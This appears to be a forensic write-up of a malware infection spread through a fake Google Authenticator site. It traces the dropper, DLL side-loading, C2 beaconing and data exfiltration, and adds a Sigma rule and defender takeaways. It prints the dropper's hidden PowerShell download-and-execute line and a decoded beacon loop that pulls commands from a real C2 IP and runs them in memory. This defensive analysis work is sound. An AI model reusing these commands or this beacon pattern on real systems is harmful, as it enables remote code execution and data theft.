Executive Summary

In the modern threat landscape, Social Engineering remains a dominant Initial Access vector. This report details the forensic analysis of a compromised host (WIN-GSH54QLW48D) infected via a malicious software installer masquerading as a Google Authenticator update.

The investigation revealed a sophisticated, multi-stage infection chain. The process began with a VBScript-based dropper that utilized an Azure-themed decoy to distract the user. This was followed by the deployment of a PowerShell-based persistent downloader and the use of DLL Side-Loading techniques to evade EDR detection. The threat actor successfully established Command and Control (C2) channels, leading to the unauthorized exfiltration of approximately 17MB of data to external nodes.

1. Initial Access: The "Typosquatting" Trap

The infection originated from user interaction with a deceptive domain. Network traffic analysis revealed a DNS query for google-authenticator[.]burleson-appliance[.]net., followed by an HTTPS connection.

While the specific payload delivery was encrypted via TLS, the sequence of events (DNS resolution followed by immediate persistent execution artifacts) confirms that this landing page acted as the delivery mechanism for the initial payload.

Network Artifacts:

  • Domain: google-authenticator[.]burleson-appliance[.]net.
  • Protocol: HTTPS (Port 443)
  • Evidence: DNS Query & TLS Client Hello.
None
Caption: Wireshark capture of the DNS query for the typosquatted domain google-authenticator[.]burleson-appliance[.]net.

2. Execution Phase: Decoys and Droppers

The execution phase is characterized by a multi-stage approach designed to minimize user suspicion. After the initial interaction with the fake "Google Authenticator" page, the infection chain continues with a sophisticated dropper mechanism.

The Decoy Strategy

A critical finding in the HTTP streams revealed a Stage 2 dropper using an XML-embedded VBScript. To evade detection and distract the victim, the script utilizes a decoy tactic: it opens the legitimate Microsoft Azure website while silently executing malicious commands in the background.

VBScript Analysis:

objShell.Run("cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command ""start-process '[<https://azure.microsoft.com>](<https://azure.microsoft.com>)'; iex (new-object System.Net.WebClient).'DownloadString'('[<http://5.252.153.241:80/api/file/get-file/29842.ps1');#URL](http://5.252.153.241:80/api/file/get-file/29842.ps1'>);#URL): [<https://teams.microsoft.com>](<https://teams.microsoft.com>)""")

Key Observations:

  • Stealth: The use of -WindowStyle Hidden ensures the PowerShell terminal remains invisible to the user.
  • Misdirection: Opening azure.microsoft.com provides a false sense of security, making the user believe they are interacting with a legitimate Microsoft service.
  • Obfuscated Metadata: The script includes a comment #URL: https[:]//teams[.]microsoft[.]com, likely intended to mislead automated sandboxes or human analysts.
None
Caption: Malicious VBScript dropper captured in an HTTP stream, displaying the Azure decoy and hidden PowerShell command.

DLL Side-Loading (T1574.002)

Parallel to the scripting engine, the attack leverages DLL Side-loading. The payload often includes a legitimate, digitally signed binary (e.g., TeamViewer[.]exe) bundled with a malicious dynamic link library (TV[.]dll). Upon execution, the trusted binary loads the malicious DLL, allowing the threat actor to execute code within a legitimate process context, effectively bypassing many EDR solutions.

None
Caption: VirusTotal analysis of the malicious TV.dll, showing a high detection rate (45/71) and confirms the threat level of the sideloaded library.

3. Persistence: The PowerShell Beacon

Following the execution of the VBScript trigger, the infected host initiates a second-stage GET request to fetch the primary payload: pas.ps1. This script is the "brain" of the persistence mechanism.

Payload Delivery

The delivery of the PowerShell script was captured in a clear-text HTTP stream. The server at 5[.]252[.]153[.]241 responded with a script that, while partially obfuscated, reveals its malicious intent upon closer inspection.

None
Caption: HTTP stream capturing the delivery of the obfuscated second-stage PowerShell script (pas[.]ps1).

Deobfuscation and Logic Analysis

The malware established persistence using a script identified as pas.ps1. The script was obfuscated, but utilizing CyberChef, I was able to decode its logic.

Decoded Logic Analysis: The script performs the following actions:

  1. Fingerprinting: Queries the Serial Number of the C:\\\\ drive to generate a unique victim ID.
  2. C2 URL Construction: The unique Serial Number is then appended to the C2 IP address to form a personalized beaconing URL
  3. Beaconing: Enters an infinite loop (while ($true)), sending requests to the C2 server every 5 seconds.
  4. Fileless Execution: Uses Invoke-Expression (IEX) to execute incoming payloads directly in memory.
# Snippet of the decoded script logic
$fso = New-Object -Com "Scripting.FileSystemObject"
$SerialNumber = $fso.GetDrive("c:\\\\").SerialNumber
$ip = '[<http://5.252.153.241/>](<http://5.252.153.241/>)'
$url = $ip+$serial
# ...
while ($true) {
    try {
        $result=$s.DownloadString($url)
    }
    # ...
    Invoke-Expression $result
}
None
Caption: Deobfuscating the pas.ps1 script in CyberChef to reveal hardware fingerprinting and C2 beaconing logic.

4. Post-Exploitation: Network Anomalies & Data Exfiltration

While many initial alerts focus on the infection vector, the true impact is revealed through the analysis of post-exploitation network behavior. In this case, the primary objective of the threat actor appears to be Data Exfiltration.

Command and Control (C2) Stealth

One of the most tactical aspects of this campaign is how the malware masks its Command and Control traffic. By utilizing legitimate TeamViewer infrastructure (e.g., master16.teamviewer[.]com), the threat actor attempts to blend in with normal administrative activity.

A closer look at the traffic reveals encoded parameters sent via din.aspx. This is a classic indicator of a custom C2 protocol tunneled through a trusted domain.

None
Caption: Suspicious beaconing activity to TeamViewer-related domains using encoded din.aspx parameters.

Analyzing the Exfiltration Channels

A deep dive into the TCP conversations revealed a significant volume of outbound traffic directed at two primary external nodes.

The most alarming discovery was the connection to 45[.]125[.]66[.]32. The transfer of approximately 10MB of data over non-standard ports (TCP 2917 and 49792) using TLS encryption is a high-fidelity indicator of data theft. Standard web traffic (HTTPS) typically utilizes port 443; the use of high-range, non-standard ports is a common tactic for custom C2 protocols or data exfiltration tools to bypass basic firewall egress rules.

Exfiltration Summary:

  • Node A: 45[.]125[.]66[.]3210 MB (Transferred via non-standard ports)
  • Node B: 5[.]252[.]153[.]2417 MB (The same node used for payload delivery and C2 beaconing)
None
Caption: TCP Conversation statistics highlighting significant data exfiltration to 45[.]125[.]66[.]32 (10 MB).

Conclusion on Objectives

The volume of data transferred (totaling ~17MB) suggests that the malware successfully harvested sensitive information from the host. Given the initial decoy (Microsoft Azure/Teams), it is highly likely that the attacker targeted session tokens, browser credentials, or local documents before the activity was captured.

5. Detection Engineering: Sigma Rule

Based on the analysis of pas.ps1, I created a custom Sigma rule to detect the specific drive fingerprinting technique used by this malware family.

title: PowerShell Drive Serial Number Reconnaissance
id: custom-detect-ps-drive-serial
status: experimental
description: Detects PowerShell scripts utilizing Scripting.FileSystemObject to query drive serial numbers. This technique is often used by malware for victim fingerprinting.
author: MabLevi
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\\powershell.exe'
            - '\\pwsh.exe'
        CommandLine|contains|all:
            - 'New-Object'
            - 'Scripting.FileSystemObject'
            - 'SerialNumber'
    condition: selection
level: medium
tags:
    - attack.discovery
    - attack.t1082

6. MITRE ATT&CK Mapping

The observed activities map to the following MITRE ATT&CK techniques:

None

7. Indicators of Compromise (IOCs)

None

Conclusion

This investigation illustrates the increasing sophistication of initial access campaigns. By combining Social Engineering (typosquatted domains) with multi-stage delivery mechanisms like VBScript droppers and Azure-themed decoys, threat actors can effectively bypass traditional perimeter defenses and elude user suspicion.

The shift towards "fileless" persistence via PowerShell and the use of legitimate binaries for DLL side-loading demonstrates a clear intent to remain stealthy within the environment. However, as shown in this analysis, these activities leave distinct network footprints.

Key Takeaways for Defenders:

  • Endpoint Visibility: Monitoring for PowerShell execution with high-risk arguments (e.g., Invoke-Expression, WindowStyle Hidden) is critical for detecting early-stage persistence.
  • Network Hygiene: Alerting on large data transfers over non-standard ports (like TCP 2917) can help identify exfiltration attempts that bypass standard web filters.
  • DNS Monitoring: Proactive hunting for typosquatted domains impersonating common corporate tools (Teams, Google Authenticator) remains one of the most effective ways to break the attack chain at the reconnaissance stage.

By maintaining deep visibility into both host behavior and network anomalies, SOC teams can transition from reactive alerting to proactive threat hunting.

Support My Research ☕️

If you found this analysis helpful, consider supporting future write-ups.

USDT (TRC20): TSoUAqJJsgSrcbXhx8riNxmrECcf7HytjX

ETH (ERC20): 0x6a92a1516eDaa44536432dD7C2de70ff5C687f6b